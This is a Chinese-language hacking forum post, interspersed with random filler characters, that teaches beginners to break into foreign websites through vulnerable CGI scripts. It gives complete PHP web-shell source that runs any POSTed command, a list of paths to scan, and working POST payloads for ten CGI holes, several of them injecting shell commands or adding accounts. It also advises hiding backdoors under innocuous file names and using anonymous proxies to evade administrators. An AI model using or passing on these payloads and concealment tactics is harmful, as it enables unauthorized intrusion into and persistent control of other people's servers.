CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
+ Q* f2 k8 k" d1 \3 p很开心来到贵论坛
% d- u, w. x) r0 {9 c! {) ]这里让我感觉 很有技术交流的感觉
; R! S: k7 [& g9 b1 n: X4 H% i" I我会长长来玩的
3 l( t$ |" p" U& b! g前言:
以下讲解针对欧美日本网站
4 H3 A2 @$ v! d( L. v! Y+ i6 v當我們在做滲透分析的時候 方法有很多
$ \) v/ |* f% \- `7 X/ B( o! |7 N我门都知道 国外伺服器大多是linux 平台
4 Y; [3 F0 U/ T7 G, {所以有很多网站程序有6成都会使用cgi 脚本来管理
7 u! ~: ]4 r* {( C, y5 D4 J9 t* m目录为/cgi-bin/
& [1 T, a; B# D' d- h! a
只是个人在实务上一些经验
写的不好 请多多见谅喔
, e0 O' x7 o* {在这里我简单分为几个部份一定要會的
4 H3 d% i" [: L; E, X讲解一下
让没有基础的人很容易上手

1 ?5 `" n! A* c/ y以下内容跟帖回复才能看到
0 Y/ ?+ P. O  R: B+ u==============================
6 m- p/ W/ q! G4 S4 T( m
: F- p; f2 c: y1 y. i第1部份: 何谓Shell?
* c1 I5 r5 {" ]! BShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
: @! P$ v( Q9 ~意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
) S* f. u; I0 s. G1 e要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
9 Z8 O' n( D0 F4 b2 K
! F1 O7 \6 _) q$ u6 j第2部份: Unix 指令
8 U  y4 s' n$ Q8 n以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
: R. a0 B" O" Vls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
. x  ^1 [% T* mls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
: E! O8 {  y  Q6 n7 o. A8 Scat: 显示档案内容
/ h, J# D8 C" s' T# \cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
! W0 B  `) O5 O+ ?3 zwho: 显示谁login 至系统
man: 显示指令用法  
) i7 h* V2 ^0 W  ]man ls: 显示ls这指令的用法  
mkdir 建立目录
rmdir 删除目录
8 |; X1 r1 ~: Y' n$ Dmv 移动档案
6 n3 f0 f8 @: S. Urm 删除档案
+ E5 }' E1 g6 I! E1 o
& d& B+ t, E$ Q第3部份: Shell的使用
例如:
2 O$ T$ ^! O1 m! G# g$ K% U4 u8 Thttp://site.com/refer.php
0 J; X5 h; z' O) R, Y8 U这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
# n  M- \6 b/ Z+ ?<Input type="text" name="cmd">
& ?" @1 F! F2 o# i; y) M4 Y# ]; g<Input type="Submit">
</Form>
<?php
5 o% f- m+ P) J: p3 K. |$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
6 r* i* W) y, i4 t& decho $Output;
?>
, ^% a7 x0 S# x# i输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

第4部份: 注意事项
* _' _4 m# Z: e2 D- 使用匿名代理, 保障自己
- Y: x" U! A) h1 k2 m- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- V  ?, I7 K$ `* H$ T- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
9 N$ {) D% `8 n9 A0 G+ W! I- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
7 k3 l7 L; P# ~  }, i. S! t# S2 E这篇文章的重点是cgi 脚本攻击
* z7 Y4 E7 K3 a2 p所以我用简单的叙述形容
+ u/ I) I( ~, Q7 i5 m3 X开始讲解脚本入侵过程:
, w: j) a) D9 q* S9 V! U2 {1 C( x) o在这里提供一些方法思路让大家学习一下
( C) k/ s, `  M/ e, R
1.一开始对一个网站进行cgi漏洞扫描
' F: ~  X0 m' u我们需要的东西有
扫洞工具 如:triton..等等
& u2 }# m3 _3 n/ G9 dE表
如
9 T! U2 z1 m+ n; g7 @# b$ n/cgi-bin/add-passwd.cgi
! y* Y+ {) n; B, g/WebShop/templates/cc.txt
6 V7 {7 G7 G0 u  P0 w/Admin_files/order.log
5 f7 c% Q3 k0 R, |! Z2 A+ m- X$ v/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
+ F, {% L+ Y8 ]# F4 _/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day

- A- j% K# l: i# Z' q) p2.怎样确认扫到的洞 是真的还假的?
" s$ t3 U; x# Y* l举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
' {8 Z1 k1 F; x! i一般都是在IE里先看一下的,记住这个返回码哦
4 @3 O$ L8 S4 Q: j* SERROR:This script should be referenced with a METHOD of POST.
) v5 a8 R0 F. m# [% |. ~没有返回一定是假的
1 a8 b: `: T' G: Y7 k* e3.重来来了 很多人都会问我
- |# M* i: P- u% g他扫到很多洞 但是不会使用
; N( z, P5 j* ^# P5 Q1 W因为这些漏洞 使用的语法 称为post
- e5 g' k' U# a9 Q4 P$ @我们要找post 的方法很多
4 ~  d; _6 `( R0 X* \+ [# b可以是源代码分析 找出介质
1 l' k5 o  i- E/ o1 i) O: L) V! d或是用抓包工具 抓他的语法...等等

: q/ D  y3 r& I: ^' Z8 w7 E. _4 C以下我提供10个 cgi 洞以及使用方法post
( j. \' T! V' R8 ^5 C+ |6 R让大家可以针对网站去做扫描  
/index.cgi
8 x3 I) }! o4 p, F+ ^wei=ren&gen=command
/ P+ ]- N" B. V& J/passmaster.cgi
+ y( k0 ]3 ?; }2 {/ q8 @Action=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
/ s6 f& x  s8 n5 a& ~name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
  @1 M. L8 K/ \9 r: v. K% xuser=username&pass=Password&confirm=Password
/ccbill-local.asp
, J$ j. Z2 T/ W& `* R" k6 fpost_values=username:password
/count.cgi
! s, @% L3 w' C% e$ I, G1 mpinfile=|echo;ls -la;exit|
- \" C: ^& Y& ]/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
( U0 s$ E! N9 l! n& h/af.cgi_browser_out=|echo;ls -la;exit;|

今天就讲到这  感谢大家支持